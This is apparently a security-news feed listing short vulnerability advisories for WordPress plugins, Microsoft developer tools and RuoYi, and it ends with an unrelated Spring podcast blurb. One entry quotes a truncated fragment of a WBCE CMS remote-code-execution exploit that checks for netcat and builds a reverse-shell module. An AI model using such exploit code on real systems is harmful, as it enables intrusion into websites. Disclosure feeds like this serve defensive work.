WordPress WP User Profiles plugin <= 2.6.2 - Privilege Escalation vulnerability

Privilege Escalation vulnerability discovered by astra.r3verii Patchstack Alliance in WordPress Plugin WP User Profiles versions = 2.6.2...

KLA82405 Multiple vulnerabilities in Microsoft Developer Tools

Multiple vulnerabilities were found in Microsoft Developer Tools. Malicious users can exploit these vulnerabilities to spoof user interface, cause denial of service, gain privileges. Below is a complete list of vulnerabilities: 1. A denial of service vulnerability in ASP.NET Core and Visual Studi...

WordPress Motors plugin <= 1.4.64 - Missing Authorization to Authenticated (Subscriber+) Arbitrary Plugin Installation vulnerability

Missing Authorization to Authenticated Subscriber+ Arbitrary Plugin Installation vulnerability discovered by mikemyers in WordPress Plugin Motors versions = 1.4.64...

WordPress coreActivity: Activity Logging for WordPress plugin <= 2.7 - Authenticated (Subscriber+) SQL Injection vulnerability

Authenticated Subscriber+ SQL Injection vulnerability discovered by Yassine NEGGAOUI in WordPress Plugin coreActivity: Activity Logging plugin for WordPress versions = 2.7...

WordPress WPFront User Role Editor plugin <= 4.2.1 - Cross-Site Request Forgery to Privilege Escalation via whitelist_options Function vulnerability

Cross-Site Request Forgery to Privilege Escalation via whitelistoptions Function vulnerability discovered by WordFence in WordPress Plugin WPFront User Role Editor versions = 4.2.1...

WordPress Asgaros Forum plugin <= 3.0.0 - File Upload Numbers Bypass vulnerability

File Upload Numbers Bypass vulnerability discovered by 20kilograma in WordPress Plugin Asgaros Forum versions = 3.0.0...

RuoYi 安全漏洞

RuoYi is a backend management system by the individual developer of RuoYi in China. A security vulnerability exists in RuoYi version v.4.8.0, which stems from the add method not properly verifying the requested user's permissions, which may result in the addition of a menu item...

WBCE CMS 1.6.3 - Authenticated Remote Code Execution (RCE)

Exploit Title: WBCE CMS " exit 1 fi if -z "$which nc" ; then echo "! Netcat is not installed." exit 1 fi ip=$1 port=$2 rm -rf shellModule.zip rm -rf shellModule mkdir shellModule echo Crafting Payload cat shellModule/info.php ?php / @category modules @package Reverse Shell @author Swammers8 @link...

WordPress ZoomSounds - WordPress Wave Audio Player with Playlist plugin <= 6.91 - Missing Authorization to Authenticated (Subscriber+) Limited Options Update and Settings Manipulation vulnerability

WordPress ZoomSounds - WordPress Wave Audio Player with Playlist plugin = 6.91 - Missing Authorization to Authenticated Subscriber+ Limited Options Update and Settings Manipulation vulnerability discovered by Lucio Sá in WordPress Plugin ZoomSounds versions = 6.91...

WordPress ZoomSounds plugin <= 6.91 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode vulnerability

Authenticated Contributor+ Stored Cross-Site Scripting via Shortcode vulnerability discovered by István Márton in WordPress Plugin ZoomSounds versions = 6.91...

WordPress MP3 Audio Player – Music Player, Podcast Player & Radio by Sonaar plugin <= 5.9.4 - Broken Access Control vulnerability

Broken Access Control vulnerability discovered by Trương Hữu Phúc truonghuuphuc in WordPress Plugin MP3 Audio Player for Music, Radio & Podcast by Sonaar versions = 5.9.4...

WordPress Privyr CRM plugin <= 1.0.2 - Broken Access Control vulnerability

Broken Access Control vulnerability discovered by Trương Hữu Phúc truonghuuphuc in WordPress Plugin Privyr CRM Integration versions = 1.0.2...

WordPress Split Test For Elementor Plugin <= 1.8.3 - SQL Injection vulnerability

SQL Injection vulnerability discovered by Phat RiO - Fore-Z co.ltd in WordPress Plugin Split Test For Elementor versions = 1.8.3...

WordPress Ultra Addons Lite for Elementor plugin <= 1.1.8 - Cross Site Scripting (XSS) vulnerability

Cross Site Scripting XSS vulnerability discovered by Michael in WordPress Plugin Ultra Addons Lite for Elementor versions = 1.1.8...

WordPress Colibri Page Builder plugin <= 1.0.329 - Cross Site Scripting (XSS) vulnerability

Cross Site Scripting XSS vulnerability discovered by Mika in WordPress Plugin Colibri Page Builder versions = 1.0.329...

WordPress B Blocks plugin <= 2.0.0 - Stored Cross Site Scripting (XSS) vulnerability

Stored Cross Site Scripting XSS vulnerability discovered by Logan Cote in WordPress Plugin B Blocks versions = 2.0.0...

WordPress Motors plugin <= 1.4.71 - Cross Site Scripting (XSS) vulnerability

Cross Site Scripting XSS vulnerability discovered by LVT-tholv2k in WordPress Plugin Motors versions = 1.4.71...

WordPress Gutenify plugin <= 1.5.7 - Cross Site Scripting (XSS) vulnerability

Cross Site Scripting XSS vulnerability discovered by Prissy in WordPress Plugin Gutenify versions = 1.5.7...

WordPress Lightbox & Modal Popup WordPress Plugin – FooBox plugin <= 2.7.33 - Cross Site Scripting (XSS) vulnerability

Cross Site Scripting XSS vulnerability discovered by Robert DeVore in WordPress Plugin FooBox Image Lightbox versions = 2.7.33...

A Bootiful Podcast: AWS Developer Advocate and industry legend James Ward

Hi, Spring fans! In this installment I talk to AWS Developer Advocate and industry legend James Ward about AWS Bedrock, Amazon Cohere, Spring AI, MCP, and so much more!...